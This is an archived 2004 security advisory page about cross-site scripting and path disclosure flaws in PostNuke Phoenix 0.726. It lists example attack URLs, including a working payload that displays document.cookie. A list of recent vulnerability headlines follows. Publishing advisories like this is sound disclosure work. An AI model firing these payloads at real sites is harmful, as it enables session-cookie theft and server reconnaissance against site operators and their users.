exploits , vulnerabilities , articles , PostNuke Phoenix Multiple Cross-Site Scripting And Path Disclosure Vulnerabilities

Title	PostNuke Phoenix Multiple Cross-Site Scripting And Path Disclosure Vulnerabilities
Published	2004-04-21-12:00AM
Updated	2004-04-21-10:57PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Discovery of these vulnerabilities has been credited to Janek Vind <come2waraxe@yahoo.com>.
Vulnerable	PostNuke Development Team PostNuke Phoenix 0.726
Not Vulnerable
Code	The following examples have been supplied: Path disclosure: http://www.example.com/postnuke0726/includes/blocks/finclude.php http://www.example.com/postnuke0726/pnadodb/drivers/adodb-access.inc.php http://www.example.com/postnuke0726/modules/NS-NewUser/user.php http://www.example.com/postnuke0726/modules/NS-Your_Account/user/links/links.changehome.php http://www.example.com/postnuke0726/modules/NS-Your_Account/user/case/case.changehome.php?op=edithome http://www.example.com/postnuke0726/modules/NS-LostPassword/user.php http://www.example.com/postnuke0726/modules/NS-Multisites/chgtheme.inc.php http://www.example.com/postnuke0726/modules/NS-Multisites/head.inc.php http://www.example.com/postnuke0726/modules/NS-Multisites/print.inc.php http://www.example.com/postnuke0726/modules/NS-User/tools.php http://www.example.com/postnuke0726/modules/NS-User/user.php Cross-Site Scripting: http://www.example.com/postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=ratedownload&ttitle=x&lid=>[xss code here] http://www.example.com/postnuke0726/modules.php?op=modload&name=Downloads&file=index&req=search&query=>[xss code here] http://www.example.com/postnuke0726/modules.php?op=modload&name=Web_Links&file=index&req=search&query=>[xss code here] http://www.example.com/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body>[xss code here] http://www.example.com/postnuke0726/javascript/openwindow.php?hlpfile=x<html><body%20onload=alert(document.cookie);>
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-16 IBM WebSphere Application Server JNDI Remote Information Disclosure Vulnerability
2009-12-16 Horde Application Framework Administration Interface Cross-Site Scripting Vulnerability
2009-12-16 Mozilla Firefox and SeaMonkey MFSA 2009-65 through -71 Multiple Vulnerabilities
2009-12-16 Merkaartor Insecure Temporary File Creation Vulnerability
2009-12-15 TYPO3 Watchdog (aba_watchdog) Unspecified Information Disclosure Vulnerability
2009-12-15 PostgreSQL Index Function Session State Modification Local Privilege Escalation Vulnerability
2009-12-15 PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
2009-12-15 IBM DB2 prior to 9.5 Fix Pack 5 Multiple Unspecified Security Vulnerabilities
2009-12-15 Sun Ray Server Software Desktop Session Handling Local Security Bypass Vulnerability
2009-12-15 Mozilla Firefox Sage Extension RSS Feeds Cross Domain Scripting Vulnerability